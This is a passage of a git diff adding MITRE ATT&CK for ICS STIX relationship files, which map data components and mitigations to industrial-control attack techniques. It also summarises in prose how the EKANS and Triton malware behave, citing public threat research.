"2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:07:03.003Z", + "description": "Program uploads may be observable in ICS management protocols or file transfer protocols. Note when protocol functions related to program uploads occur. In cases where the ICS protocols is not well understood, one option is to examine network traffic for the program files themselves using signature-based tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab.json new file mode 100644 index 0000000000000000000000000000000000000000..2060e9446392fbd54d03151be1795de1b1ed1834 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--90dde535-1f13-461a-a6e3-cddc6b453c1b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Ben Hunter and Fred Gutierrez July 2020", + "description": "Ben Hunter and Fred Gutierrez 2020, July 01 EKANS Ransomware Targeting OT ICS Systems Retrieved. 2021/04/12 ", + "url": "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems" + }, + { + "source_name": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020", + "description": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly 2020, July 15 Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT Retrieved. 2021/04/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:45:28.094Z", + "description": "Before encrypting the process, [EKANS](https://attack.mitre.org/software/S0605) first kills the process if its name matches one of the processes defined on the kill-list. (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) EKANS also utilizes netsh commands to implement firewall rules that blocks any remote communication with the device. (Citation: Ben Hunter and Fred Gutierrez July 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79.json new file mode 100644 index 0000000000000000000000000000000000000000..bccf98a4e387abd82706c65c6e53f650dc803465 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--dc51052f-166e-472d-9f79-c738c8f1f69b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1299dd2d-4f42-4f5f-876b-bf7dacd17c79", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:10:34.653Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed.json new file mode 100644 index 0000000000000000000000000000000000000000..f0c2f12524f72176a2622d35d2640ac3cf2b2a57 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--ac5181ef-95a6-4248-8b4b-a691581729da", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.077Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f.json new file mode 100644 index 0000000000000000000000000000000000000000..72384758983ef960794828c6ecdcc6c096977bda --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--37ebd044-1701-494c-adb8-e0e9e8568623", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1377fdf9-5201-4204-b6d3-df2fb5f4d02f", + "created": "2022-09-26T18:41:48.947Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:41:48.947Z", + "description": "Monitor for firmware changes which may be observable via operational alarms from devices.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13809e98-1d74-4c39-b882-9d523c76cbde.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13809e98-1d74-4c39-b882-9d523c76cbde.json new file mode 100644 index 0000000000000000000000000000000000000000..0da0167d5c541a002bade3ff245ff8a1feafb55b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13809e98-1d74-4c39-b882-9d523c76cbde.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0ace630c-8e74-4a17-b09d-a7292ad32e1f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--13809e98-1d74-4c39-b882-9d523c76cbde", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:24:07.929Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s imain.bin payload takes commands from the TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex) and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984.json new file mode 100644 index 0000000000000000000000000000000000000000..e5adfab40aa9b4998f40915ed41b79ee419a330c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--6cae3edc-133c-4640-9db8-536f8bc546b1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52.json new file mode 100644 index 0000000000000000000000000000000000000000..e873cd75211d6ff64a8a750d8ab11f5bc903909c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--d12cf3c9-f24a-4639-b28b-c3bb4a9af9b5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--13fb2612-7c23-4b9d-a6e1-76f78062fc52", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:38:23.604Z", + "description": "Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--147c2158-b2af-4d88-9d59-594c67a9200e.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--147c2158-b2af-4d88-9d59-594c67a9200e.json new file mode 100644 index 0000000000000000000000000000000000000000..461a10680591830c4f98c460b347367a17a9ea25 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--147c2158-b2af-4d88-9d59-594c67a9200e.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--e22bd03f-bb98-410a-a19b-53a198a95bff", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--147c2158-b2af-4d88-9d59-594c67a9200e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.204Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15188683-7ded-4578-9102-73459ecbe095.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15188683-7ded-4578-9102-73459ecbe095.json new file mode 100644 index 0000000000000000000000000000000000000000..5aef6fe42733d506ce2043afe22f0a2f1a24fbc9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15188683-7ded-4578-9102-73459ecbe095.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--8228b3ca-dd81-41f6-998e-7f23bc6f61cd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--15188683-7ded-4578-9102-73459ecbe095", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:37:54.914Z", + "description": "Monitor for newly executed processes related to services specifically designed to accept remote graphical connections, such as RDP and VNC. [Remote Services](https://attack.mitre.org/techniques/T0886) and [Valid Accounts](https://attack.mitre.org/techniques/T0859) may be used to access a host\u2019s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--154de746-5ea2-43b4-97b2-221b2433cbde.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--154de746-5ea2-43b4-97b2-221b2433cbde.json new file mode 100644 index 0000000000000000000000000000000000000000..c23d9151a5cc44f3dec397afe7121b7a94927a55 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--154de746-5ea2-43b4-97b2-221b2433cbde.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--34102d90-ed05-438c-8af1-bb3bda7bcbbc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--154de746-5ea2-43b4-97b2-221b2433cbde", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:48:49.308Z", + "description": "Monitor ICS automation network protocols for information that an asset has been placed into Firmware Update Mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15a39e3b-124e-4e68-95b5-7b8020225c12.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15a39e3b-124e-4e68-95b5-7b8020225c12.json new file mode 100644 index 0000000000000000000000000000000000000000..82cdaf1934e9a15b3dd282ae5f447f18492a1e83 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--15a39e3b-124e-4e68-95b5-7b8020225c12.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--51f1b0bd-4c85-43c3-8743-b4bd17252ba6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--15a39e3b-124e-4e68-95b5-7b8020225c12", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:27.289Z", + "description": "Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34.json new file mode 100644 index 0000000000000000000000000000000000000000..ab3becb974fd864ae1542d9ab4ac09bda34fe28f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--60fdf5a9-be77-4b23-92e8-e41a283a72c6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "This technique may not be effectively mitigated against, consider controls for assets and processes that lead to the use of this technique.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17fdec71-98e8-4314-a1be-037edede58bd.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17fdec71-98e8-4314-a1be-037edede58bd.json new file mode 100644 index 0000000000000000000000000000000000000000..738e9573c91ba2da30591718791eab55b623278c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17fdec71-98e8-4314-a1be-037edede58bd.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--6876f50a-c39a-4745-9c2d-e714e912d3bd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--17fdec71-98e8-4314-a1be-037edede58bd", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:26:48.171Z", + "description": "Devices that allow remote management of firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--18ef2d69-d11a-4d31-a803-da989c4073f7.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--18ef2d69-d11a-4d31-a803-da989c4073f7.json new file mode 100644 index 0000000000000000000000000000000000000000..a01d66cc3f4b14b5111d7965accf5ef92a959a78 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--18ef2d69-d11a-4d31-a803-da989c4073f7.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--5de0612c-ed06-41c2-8498-8df4edc35ddc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--18ef2d69-d11a-4d31-a803-da989c4073f7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.096Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--193c3cd3-0b22-4839-a1fa-413aee61e882.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--193c3cd3-0b22-4839-a1fa-413aee61e882.json new file mode 100644 index 0000000000000000000000000000000000000000..d0cdbd27ef1bb81ead2c1db72458d9f75c225a20 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--193c3cd3-0b22-4839-a1fa-413aee61e882.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--a4abda3f-c184-4ec3-8917-ab1ce4488216", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--193c3cd3-0b22-4839-a1fa-413aee61e882", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:40.378Z", + "description": "Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19ab6776-42de-48af-975a-568d31a3bb66.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19ab6776-42de-48af-975a-568d31a3bb66.json new file mode 100644 index 0000000000000000000000000000000000000000..91efe8700cc98e10d3da96b15f2a3f06b4fc8cc5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19ab6776-42de-48af-975a-568d31a3bb66.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--b54623a8-17bb-4f74-a58e-3f9c70498b7a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--19ab6776-42de-48af-975a-568d31a3bb66", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.152Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016) (Citation: N/A)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Department of Homeland Security 2016, September Retrieved. 2020/09/25 Alarm Management for Process Control Retrieved. 2020/09/25 ", + "url": "https://www.exida.com/images/uploads/18492275-Alarm-Management-for-Process-Control.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348.json new file mode 100644 index 0000000000000000000000000000000000000000..434a1770a86f1b3bea0a7331971f0d7592fd98b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--16fbe2e3-8646-420c-84c8-304b2b19d6df", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348", + "created": "2022-09-28T21:18:55.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + 